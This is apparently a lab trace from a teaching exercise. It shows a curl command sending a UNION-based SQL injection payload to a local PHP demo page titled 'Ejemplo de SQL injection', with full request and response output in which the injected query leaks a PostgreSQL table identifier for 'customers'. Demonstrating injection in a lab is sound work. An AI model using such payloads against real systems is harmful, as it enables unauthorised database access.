curl "http://localhost/xSearchInjection.php?i_anio=1994%27%20and%201%3D0%20union%20all%20select%20cast(oid%20as%20character%20varying)%20from%20pg_class%20where%20relname%20%3D%20%27customers%27%3B%20--" --trace-ascii e.txt 

== Info:   Trying ::1...
== Info: TCP_NODELAY set
== Info: Connected to localhost (::1) port 80 (#0)
=> Send header, 252 bytes (0xfc)
0000: GET /xSearchInjection.php?i_anio=1994%27%20and%201%3D0%20union%2
0040: 0all%20select%20cast(oid%20as%20character%20varying)%20from%20pg
0080: _class%20where%20relname%20%3D%20%27customers%27%3B%20-- HTTP/1.
00c0: 1
00c3: Host: localhost
00d4: User-Agent: curl/7.57.0
00ed: Accept: */*
00fa: 
<= Recv header, 17 bytes (0x11)
0000: HTTP/1.1 200 OK
<= Recv header, 17 bytes (0x11)
0000: Host: localhost
<= Recv header, 39 bytes (0x27)
0000: Date: Tue, 19 Dec 2017 11:40:31 +0000
<= Recv header, 19 bytes (0x13)
0000: Connection: close
<= Recv header, 25 bytes (0x19)
0000: X-Powered-By: PHP/7.2.0
<= Recv header, 40 bytes (0x28)
0000: Content-type: text/html; charset=UTF-8
<= Recv header, 2 bytes (0x2)
0000: 
<= Recv data, 520 bytes (0x208)
0000: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> 
0040: .<html>.  <head>.    <meta http-equiv="Content-Type" content="te
0080: xt/html; charset=UTF-8">.    <title>Ejemplo de SQL injection</ti
00c0: tle>.  </head>.  <body>.    <h2> Ejemplo de SQL injection: Infor
0100: maci..n en la BD</h2>.      <form name="consultaanio" method="ge
0140: t" action="xSearchInjection.php">.        Pel..culas del a..o: <
0180: input name="i_anio"/><br/>.        <input type="submit" value="M
01c0: ostrar"/>.      </form>.    <ol>.<li>21275</li>.</ol>.  </body>.
0200: </html>.
== Info: Closing connection 0
